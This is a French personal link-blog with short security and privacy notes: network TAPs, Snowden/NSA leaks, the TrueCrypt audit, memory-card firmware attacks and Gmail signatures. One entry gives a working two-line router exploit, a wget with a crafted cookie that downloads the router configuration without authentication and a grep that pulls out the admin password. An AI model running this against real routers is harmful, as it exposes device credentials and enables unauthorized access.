Un gus a réussi à trouver l'algo que sa banque utilise pour générer des codes d'accès. Sympa.

Un TAP ethernet (ou plutôt un TAP réseau) est un dispositif permettant de surveiller un réseau informatique sans le perturber (TAP est l'abréviation de Test Access Port).

Je me le note de côté, j'ai dans l'idée d'espionner ce que ma Freebox envoie et ce qu'elle a dans le ventre (interception du firmware [pas sûr d'avoir le niveau, mais j'ai confiance]).

D'autres liens intéressants :

• http://www.enigmacurry.com/articles/building-an-ethernet-tap/
• http://www.altsec.info/passive-network-tap.html
• https://fr.wikipedia.org/wiki/TAP_r%C3%A9seau

Plus moche que ça, tu meures :
wget --header="Cookie: :language=en" http://192.168.2.1/cgi-bin/DownloadCfg/config.cfg -t 1

Et voilà, vous avez la configuration du routeur. Le mot de passe se trouve dans le paramètre "http_passwd" :
grep http_passwd config.cfg

"The Internet Dark Age"

Un document qui combine un peu tout ce que Snowden a pu libérer, et qui prouve que Bruce Schneier avait raison (comme tout un tas d'autres d'auilleurs).

Et oui mes cocos, c'est l'heure de prendre les armes, ça ne va plus là.

Bonne fêtes à tous :)

Oh. Mon. Dieu !!!
50 pages de documents "made in NSA", et ça fait encore plus mal que pire que tout... Comme disaient Jérémie et Benjamin dans leur dernière conférence, il faut urgemment se tourner vers du matériel (hardware) open-source et, surtout, libre !

Putain quelle misère 😒

via https://chabotsi.fr/links/?RACFSw

Et voilà, documents à l'appui...

http://www.spiegel.de/static/happ/netzwelt/2014/na/v1/pub/img/Mobilfunk/S3223_CROSSBEAM.jpg
http://www.spiegel.de/static/happ/netzwelt/2014/na/v1/pub/img/Mobilfunk/S3224_CANDYGRAM.jpg
http://www.spiegel.de/static/happ/netzwelt/2014/na/v1/pub/img/Mobilfunk/S3224_TYPHON_HX.jpg

Exécuter du code directement depuis les cartes mémoire. Il s'agit du micro-contrôleur qui contient quelques failles. Donc entre le contenu de la carte elle-même et l'OS. Une attaque de l'homme du milieu si on veut :)
[https://events.ccc.de/congress/2013/Fahrplan/events/5294.html]

Un outil pour analyser un PDF en profondeur. Pratique pour y dénicher des codes malveillants, par exemple...

Dépôt GitHub : https://github.com/hiddenillusion/AnalyzePDF

TL;DR mais ça semble intéressant.

Quelques informations à propos de l'audit de TrueCrypt, en résumé :

• dons reçus : 62,104 $ USD et 32.6 BTC de la part de 1 434 personnes (wow !!)
• apparemment, il y a du beau monde qui jettera un œil au code, et ça c'est bien
• création de l'association à but non lucratif OCAP : Open Crypto Audit Project
• premier contrat avec iSEC partners (là aussi du lourd, apparemment) pour la revue du code Windows et du bootloader
• l'audit commencera en janvier

Ça sent bon tout ça ^^ Et à voir comment la communauté se comporte, c'est vraiment génial je trouve.

Hop, un petit exploit pour les routeurs D-Link DSR-150 & DSR-150N, DSR-250 & DSR-250N, DSR-500 & DSR-500N et DSR-1000 &DSR-1000N.

Oh pas mal ! Couplé à zerobin, ça devient pas mal !

1. créer une chat room
2. copier le lien de la chat room dans un zerobin "Burn after reading"
3. copier le lien du zerobin dans un autre zerobin "Burn after reading"
4. envoyer ce dernier lien à votre correspondant

Là on est bien !

Nous sommes définitivement entourés d'incompétents incultes.

Outch, ça fait la dose quand même.
Comme l'a dit Bronco, coupez la 3G quand vous ne vous en servez pas, idem pour le Wi-Fi et GPS.

Bruce Schneier fait son AMA sur Reddit !

Ah mais putain ! Va falloir se ballader avec un brouilleur partout où que l'on aille ?!

Conclusion : préférez l'utilisation de calloc à malloc, car le premier rempli la zone mémoire allouée de zéros, histoire d'assainir le terrain.

Les certificats SSL de plus 8192 bit ne sont pas bien pris en compte sur Mac OSX. Voici comment corriger ce probèle :

Mountain Lion et version inférieures :
sudo defaults write /Library/Preferences/com.apple.crypto RSAMaxKeySize -int 8192

Mavericks et version supérieures :
sudo defaults write /Library/Preferences/com.apple.security RSAMaxKeySize -int 8192

L'historique de connexion/modification de votre compte GitHub.

Je viens de changer de mot de passe, car depuis 2 jours, ça bruteforce sec sur le mien :)

Hm ! La messagerie instantanée de GMail ajoute un champ 'google-mail-signature' à tous les messaes envoyés. Aucune documentation n'existe et la signature change suivant le contenu du message, de l'emetteur et du récepteur. Elle ne change pas si les infos sont les mêmes.
Il semblerait qu'il s'agisse du condensat SHA1 de tout ça, mais sans preuve.

Ce qui peut craindre dans tout ça, c'est que si seul Google peut déchiffrer cette signature, ça pourrait vouloir dire qu'ils stockent tous les messages, et qu'ils auraient la possibilité de prouver que vous avez bien envoyé tel message à telle personne.

Bref, sans en savoir plus, on ne peut pas faire de conclusion hâtive. Mais dans l'absolu, et connaissant Google, la vie privée/intime en prend encore un sacré coup. Et niveau sécurité d'écoute pour les messages importants/privés/secrets, ça pue.